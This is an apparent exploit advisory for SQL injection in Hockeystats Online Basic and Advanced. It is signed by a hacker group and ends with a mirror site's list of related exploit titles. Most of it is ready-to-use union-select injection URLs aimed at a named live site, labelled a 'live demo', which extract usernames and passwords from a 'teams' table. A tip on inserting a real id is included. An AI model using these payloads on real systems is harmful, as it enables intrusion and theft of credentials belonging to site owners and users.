###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## Hockeystats Online V BASIC & ADVANCED ( index.php opt )
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f
##
## Email : SQL@Hotmail.it
##
## SYRiAN Arab HACkErS
########################
########################
##
## -[[: L!VE DEMO :]]-
##
## [[BASIC VERSION]] www.thehockeystop.com/hstatsbasic/?opt=viewpage&type=html&id=-00002' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0 from teams/*
## www.thehockeystop.com/hstatsbasic/index.php?opt=schedule&season=1&divid=-1' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL from teams/*
##
## [[ADVANCED VERSION]] www.thehockeystop.com/hockeystats/?opt=viewpage&type=html&id=-00002' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0 from teams/*
## www.thehockeystop.com/hockeystats/index.php?opt=schedule&season=1&divid=-1' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL from teams/*
########################
########################
-[[ NOTE ]]-
1 ) In the first exploite you you need set the real id ?opt=viewpage&type=html&id=-< real id >' union select 0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0 from teams/*
2 ) Download [[Basic version]] code from here ;D http://www.thehockeystop.com/site/downloads/HSO_basic/HockeySTATS_Basic.zip
#######################################################################################################
#######################################################################################################
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
#######################################################################################################
#######################################################################################################
【HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities】相关文章:
★ Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)
★ Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
★ BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)
★ TGS CMS 0.3.2r2 Remote Code Execution Exploit
★ Joomla Component n-forms 1.01 Blind SQL Injection Exploit
★ MFORUM 0.1a Arbitrary Add-Admin Vulnerability
★ minb 0.1.0 Remote Code Execution Exploit
★ Joomla Component DT Register Remote SQL injection Vulnerability